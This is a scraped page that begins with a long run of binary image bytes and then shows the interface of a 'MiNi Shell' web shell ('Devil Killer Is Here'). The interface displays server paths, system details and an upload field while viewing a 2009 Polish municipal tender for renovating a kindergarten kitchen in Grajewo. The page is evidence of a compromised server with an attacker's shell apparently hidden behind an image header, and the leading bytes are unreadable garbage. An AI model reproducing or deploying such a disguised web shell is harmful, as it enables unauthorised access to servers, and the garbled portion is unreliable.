JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090604/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090604/86471-N-2009.html

<p class="kh_header"><b>Grajewo: Remont kuchni oraz zaplecza magazynowo-sanitarnego w Przedszkolu Miejskim nr 6 w Grajewie</b><br>
<b>Numer ogłoszenia: 86471 - 2009; data zamieszczenia: 04.06.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Miasta Grajewo , ul. Strażacka 6, 19-200 Grajewo, woj. podlaskie, tel. 086 2723235, faks 086 2723238.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.grajewo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont kuchni oraz zaplecza magazynowo-sanitarnego w Przedszkolu Miejskim nr 6 w Grajewie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie pn Remont kuchni oraz zaplecza magazynowo-sanitarnego w Przedszkolu Miejskim nr 6 w Grajewie polega na wykonaniu nw robót:

I. ROBOTY OGÓLNOBUDOWLANE

1.	Wykucie z muru ościeżnic drewnianych o powierzchni   - 18,450m2   
2.	Wykucie z muru ościeżnic drewnianych -okna podawcze  -  2 szt
3.	Zerwania posadzki z tworzyw sztucznych -  29,502m2
4.	Rozebranie wykładziny ściennej z płytek ceramicznych  -  94,832m2
5.	Rozebranie posadzek z płytek ceramicznych - 50,033m2
6.	Odbicie tynków wewnętrznych z zaprawy cementowo-wapiennej na ścianach -                                   21,635m2
7.	Zeskrobanie i zmycie starej farby  - 158,698m2        
8.	Ościeżnice drewniane stalowe dwukrotnie malowane   -  3szt.
9.	Skrzydła drzwiowe płytowe wewnętrzne, wejściowe pełne jednodzielne    powierzchni do 2.0m2 fabrycznie wykończone   -  3m2
10.	Wymiana stolarki drewnianej na drzwi aluminiowe jednoskrzydłowe  - 12,915m2
11.	Wymiana okien zespolonych na okna uchylne jednodzielne z PCV okna podawcze   -2,53m2
12.	 Kratki wentylacyjne typ A o obwodzie do 1000mmdo przewodów murowanych  - 14 szt
13.	Tynki wewnętrzne zwykłe kat. III wykonywane ręcznie   w pomieszczeniach   remontowanych na ścianach i słupach bez osiatkowania - 124,867m2         
14.	Zaprawy wyrównujące pod płytki ceramiczne i terakotę z masy wyrównującej ATLAS na ścianach wewnętrznych-dodatek za każdy mm grubości lecz nie więcej niż w całości 15mm-krotność x5 - 24,867m2
15.	Licowanie ścian płytkami o wymiarach 20x20cm na klej metodą kombinowaną-185,877m2
16.	Zaprawy wyrównujące grub.5.00mm na gotowym suchym podłożu pod płytki ceramiczne i terakotę z masy wyrównującej ATLAS na ścianach wewnętrznych - 78,388m2
17.	Posadzki płytkowe z kamieni sztucznych, płytki 30x30cm układane na klej metodą kombinowaną -78,388m2
18.	Wewnętrzne gładzie gipsowe dwuwarstwowe na suficie z elem.prefabrykowanych i betonów wylewanych - 78,388m2,
19.	Wewnętrzne gładzi gipsowe dwuwarstwowe na ścianach z elem.prefabrykowanych i betonów wylewanych -90,570m2
20.	Dwukrotne malowanie farbami emulsyjnymi starych tynków  wewnętrznych ścian i sufitów - 90,570m2

II. ROBOTY SANITARNE
21.	Demontaż kotła warzelnego , patelni elektrycznej i kotłów warzelnych,za okres robót obejmuje odłączenie z sieci elektrycznej oraz z instalacji wodociągowej- 1 kpl
22.	 Demontaż umywalki     -3kpl
23.	 Demontaż wanny          - 2kpl
24.	 Demontaż zlewu kuchennego - 5kpl
25.	 Demontaż ustępu z miską fajansową  -1kpl
26.	 Demontaż rurociągu żeliwnego kanalizacyjnego o śr.50-100mm  ,na ścianach budynku
     - 10,50m

27.	Demontaż podejścia odpływowego z rur z PCW o śr. 110mm - 2szt.
28.	Demontaż baterii wannowej  - 3szt
29.	Demontaż mieszacza natryskowego o śr. 15x20 20x25mm - 1szt.
30.	Demontaż baterii umywalkowej i zmywakowej   - 12szt
31.	Demontaż grzejnika żeliwnego członowego o powierzchni  ogrzewalnej do 7.5m2 - 10 kpl
32.	Demontaż zaworu grzejnikowego lub dwuzłączki o śr. 25-32mm -  10szt
33.	Wymiana wpustu ściekowego żeliwnego podłogowego o śr.50mm - 3szt
34.	34. Montaż rurociągów z PCW o śr.75mm na ścianach z łączeniem  metodą wciskową -20,0mb
35.	Montaż rurociągów z PCW o śr. 110 mm na ścianach z łączeniem  metodą wciskową - 6,0mb
36.	Dodatek za wykonanie podejść odpływowych z rur i kształtek   z nieplastyfikowanego PCW o śr. 50mm - 8 szt.
37.	Dodatek za wykonanie podejść odpływowych z rur i kształtek    z nieplastyfikowanego PCW o śr. 110mm - 2 szt.
38.	Montaż czyszczaków żeliwnych kanalizacyjnych o śr. nom 100mm   - 1szt
39.	Montaż zlewozmywaków ze stali nierdzewnej    -  8szt
40.	Montaż umywalek pojedynczych porcelanowych z syfonem gruszkowym -   3szt
41.	Montaż wanien kąpielowych stalowych bez obudowy  -  2kpl
42.	Montaż ustępów pojedynczych z płuczkami z tworzyw sztucznych lub porcelany kompakt - 1kpl
43.	Rurociągi z rur polipropylenowych o śr. zewn 20mm na ścianach     w budynkach mieszkalnych -35,0mb
44.	Dodatki za podejścia dopływowe do zaworów wypływowych ,baterii,  hydrantów itp. o śr. zewn. rury 20mm - 14szt.
45.	Dodatki za podejścia dopływowe do płuczek ustępowych o śr  .zewn.rury 20 mm - 1szt.
46.	Baterie umywalkowe lub zmywakowe ścienne o śr.nom. 15mm  - 11szt
47.	Baterie wannowe ścienne o śr.nom.15mm  -  3szt
48.	Montaż brodzika natryskowego z tworzywa sztucznego wraz z    montażem kabiny  natryskowej z tworzywa sztucznego  - 1kpl
49.	Grzejniki aluminiowe typu G-500 do 10 elementów -  10kpl
50.	Zawory grzejnikowe o śr. nominalnej 15mm(zawór grzejnikowy  z głowicą termostatyczną wraz z zaworem odcinającym) - 10szt.
51.	Montaż kotła warzelnego, patelni elektrycznej i kociołków    warzelnych(zakres robót obejmuje podłączenie do sieci elektrycznej oraz do instalacji wodociągowej) - 1kpl
52.	Wywóz ziemi samochodami samowyładowczymi za każdy nast. 1km -   8m3
53.	Wywiezienie gruzu spryzmowanego samochodami skrzyniowymi-za  każdy następny 1km-krotność 5 - 8m3.

III.ROBOTY ELEKTRYCZNE
	
54.	Demontaż oprawek zwykłych do zawieszania - 12szt.
55.	Demontaż opraw świetlówkowych z tworzyw sztucznych - 12szt.
56.	Demontaż tablic bezpiecznikowych z powierzchni do 0,5m2 - 5szt.
57.	Demontaż łączników instalacyjnych, podtynkowych o natężeniu pradu do 10A -1wylot (wyłącznik lub przełącznik 1 biegunowy) - 11szt.
58.	Demontaż przewodów kabelkowych z podłoża ceglanego lub botonowego - 35mb
59.	Montaż z podłączeniem na gotowym podłożu opraw świetlówkowych - 24szt.
60.	Montaż na gotowym podłożu odgałęźników bryzgoszczelnych bakelitowych bezśrubowo z podłączeniem przewodów kabelkowych do 2,5mm2 w powłoce polwinitowej (3 wyloty) - 8szt.
61.	Montaż na gotowym podłożu odgałęźników z tworzyw sztucznych natynkowych  do 16mm2  przez przykręcenie z podłączeniem przewodów kabelkowych 16mm2 (4 wyloty) - 2szt.
62.	Montaż na gotowym podłożu gniazd bezpiecznikowych ściennych zamkniętych 25A 1-biegunowych z podłączeniem - 4szt.
63.	Przewód wtynkowy łączny przekrój żył do 7,5mm2 - 30m
64.	Montaż gotowego podłoża gniazd wtyczkowych natynkowanych 2-biegunowych z uziemieniem przykręcanych 16A/2,5mm2 z podłączeniem 10 - 10szt.
65.	Pomiary instalacji elektrycznych w obwodzie 1-fazowym  oraz w obwodzie 3-fazowym..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.40.00.00-1, 45.31.00.00-3, 45.33.00.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 40.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O zamówienie mogą ubiegać się wykonawcy, którzy: 
1.	spełniają warunki określone w art.22 ust.1 pkt. 1 - 3  i nie podlegają wykluczeniu  z
      postępowania o udzielenie zamówienia  na podstawie art.24 ust.1i 2 ustawy w tym:
1)	posiadają uprawnienia do wykonania określonej działalności lub czynności wymaganych przepisami prawa i nie podlegają wykluczeniu na podstawie art. 24 ustawy
2)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia tj zrealizowali z należytą starannością w okresie ostatnich 5 lat przed dniem wszczęcia n.n postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej  2 zamówienia na  roboty budowlane odpowiadające swoim rodzajem i wartością robotom budowlanym, stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania. Należy załączyć dokumenty potwierdzające, że roboty te zostały wykonane należycie. Do robót o podobnym rodzaju zaliczone będą 2 zamówienia, których wartość wyniosła min. 60 000 zł brutto.

b)	będą dysponować w momencie złożenia oferty osobą posiadającą uprawnienia budowlane do sprawowania samodzielnych funkcji w budownictwie z co najmniej 2-letnim stażem na stanowisku kierownika robót budowlanych w specjalności konstrukcyjno-budowlanej. Jeżeli osoba, o której mowa wyżej nie jest pracownikiem Wykonawcy w rozumieniu art 2   Kodeksu pracy, to należy załączyć ,Zobowiązanie do współpracy stanowiące, że  osoba podejmuje swoje obowiązki z chwilą podpisania umowy przez  Wykonawcę  z  Zamawiającym lub pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zadania.
3)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
         
2.	zapewnią termin realizacji zamówienia: w ciągu 40 dni od daty podpisania umowy.
3.	zobowiążą się do udzielenia gwarancji na wykonane roboty, na okres co najmniej 36 miesięcy  licząc od daty ostatecznego odbioru robót,
4.	zobowiążą się do podpisania umowy wg wzoru stanowiącego załącznik nr 3 do  specyfikacji istotnych warunków zamówienia.
5.   będą związani złożoną ofertą przez okres 30 dni licząc od dnia składania ofert,
6.  wyrażą zgodę na warunki płatności określone w paragrafie 12 i 8 umowy będącej 
      załącznikiem do niniejszej specyfikacji,
7.  dokonali wizji lokalnej placu budowy i uzyskali   niezbędne  informacje do przygotowania 
     oferty.
8. złożą komplet wymaganych dokumentów,
9. spełniają wszystkie warunki udziału w postępowaniu,
10. podana cena oferty uwzględnia wszystkie koszty wykonania zamówienia.
11. oferta będzie sporządzona zgodnie ze Specyfikacją Istotnych Warunków Zamówienia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Oferta musi zawierać następujące dokumenty:
1. Kompletny i podpisany formularz ofertowy , 
2. Oświadczenie, że Wykonawca spełnia warunki określone w art.22 ust.1 pkt.1-3  ustawy z dnia 29 stycznia 2004r - Prawo zamówień publicznych oraz nie podlega wykluczeniu na podstawie art.24 ust,1 i 2 ustawy ,
3. Aktualny (tzn. zawierający dane od ostatniej zmiany) odpis z właściwego rejestru lub aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. W przypadku Wykonawcy będącego spółką cywilną obowiązuje załączenie umowy spółki cywilnej i zaświadczenia o zgłoszeniu działalności gospodarczej każdego uczestnika spółki. W przypadku złożenia oferty przez konsorcjum, wymagane jest złożenie dokumentów, o których mowa wyżej, przez każdego partnera konsorcjum odrębnie. 
4. Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego, potwierdzające, że Wykonawca  nie zalega z opłacaniem podatków i opłat związanych z działalnością wykonawcy lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 
W przypadku składania oferty przez podmioty występujące wspólnie właściwe dokumenty muszą być złożone przez każdy podmiot.
5. Aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego, potwierdzające, że Wykonawca  nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 
W przypadku składania oferty przez podmioty występujące wspólnie właściwe dokumenty muszą być złożone przez każdy podmiot 
6. Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art.24 ust.1 pkt 4 - 8 ustawy, wystawiona nie wcześniej niż 6 miesięcy przed upływem  terminu  składania ofert.
W przypadku składania oferty przez podmioty występujące wspólnie właściwe dokumenty muszą być złożone przez każdy podmiot.
7. Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert ( o ile dotyczy) 
W przypadku składania oferty przez podmioty występujące wspólnie właściwe dokumenty muszą być złożone przez każdy podmiot
8. Wykaz wykonywanych robót budowlanych w okresie ostatnich 5 lat przed dniem wszczęcia n.n postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim  rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości , daty i miejsca wykonania - zgodnie z załącznikiem 2b.
9. Dokumenty potwierdzające, że roboty budowlane, o których mowa w punkcie 8 zostały wykonane z należytą starannością,
10. Wykaz osób, którymi dysponuje, lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności - wg, zał. nr 2a.
12. Dokumenty stwierdzające, że osoby, które będą  uczestniczyć w wykonaniu zamówienia posiadają wymagane uprawnienia - załączyć odpisy uprawnień w zakresie branży wymaganej w rozdziale VIII SIWZ i ewentualnie zaświadczenie o współpracy wg załącznika nr 5 oraz stosowne odpisy zaświadczeń o przynależności do właściwej Izby Samorządu Zawodowego-dołączyć do załącznika 2a.
13. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej zamiast dokumentów, o których mowa w pkt. 3, 4, 5 i 7 składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzające odpowiednio, że:
a)	nie otwarto jego likwidacji lub nie ogłoszono upadłości (wystawione nie wcześniej niż   6 miesięcy przed upływem terminu składania ofert)
b)	nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne i zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu (wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert)
c)	nie orzeczono wobec niego zakazu ubiegania się o zamówienie (wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert)
d)	zamiast dokumentu, o którym mowa w pkt. 6 składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia lub zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt. 4 - 8 ustawy (wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert)
14. W przypadku gdy ofertę składa Wykonawca, który zamierza realizować zamówienie korzystając z usług Podwykonawcy to obowiązany jest określić zakres robót,   który będzie wykonywał.  
15. W przypadku, gdy o zamówienie ubiega się Wykonawca występujący jako konsorcjum, zobowiązany jest on do przedłożenia wraz z ofertą pełnomocnictwa w celu ustalenia podmiotu uprawnionego do występowania w imieniu grupy Wykonawców. Z w/w pełnomocnictwa winno wynikać:
a) jakie podmioty tworzą konsorcjum,
b) wskazanie podmiotu uprawnionego do występowania w imieniu Wykonawców z podaniem zakresu jego umocowania,
c) określenie celu wspólnych działań jako: złożenie wspólnej oferty oraz zrealizowanie przedmiotu niniejszego zamówienia,
c)wskazanie zakresu obowiązków i działań każdego z uczestników konsorcjum (z podaniem % udziału w realizacji zamówienia),
d)oznaczenie czasu trwania konsorcjum ( na okres nie krótszy niż okres realizacji przedmiotu zamówienia i okres gwarancji/rękojmi ),
16. W przypadku gdy ofertę składa spółka z ograniczoną odpowiedzialnością, a wartość oferty dwukrotnie przewyższa wysokość kapitału zakładowego, wymagane jest załączenie stosownego dokumentu (uchwała wspólnika lub umowa spółki) w trybie art. 230 k.s.h. (ustawa z dn. 15 września 2000r, Dz. U. Nr 94 poz. 1037)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http:um-grajewo.pbip.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Przedszkole Miejskie nr 6 w Grajewie
0s.Południe 34
19-203 Grajewo tel (fax).086-272-35-04.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.06.2009 godzina 12:00, miejsce: Przedszkole Miejskie nr 6 w Grajewie
0s.Południe 34
19-203 Grajewo - kancelaria.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com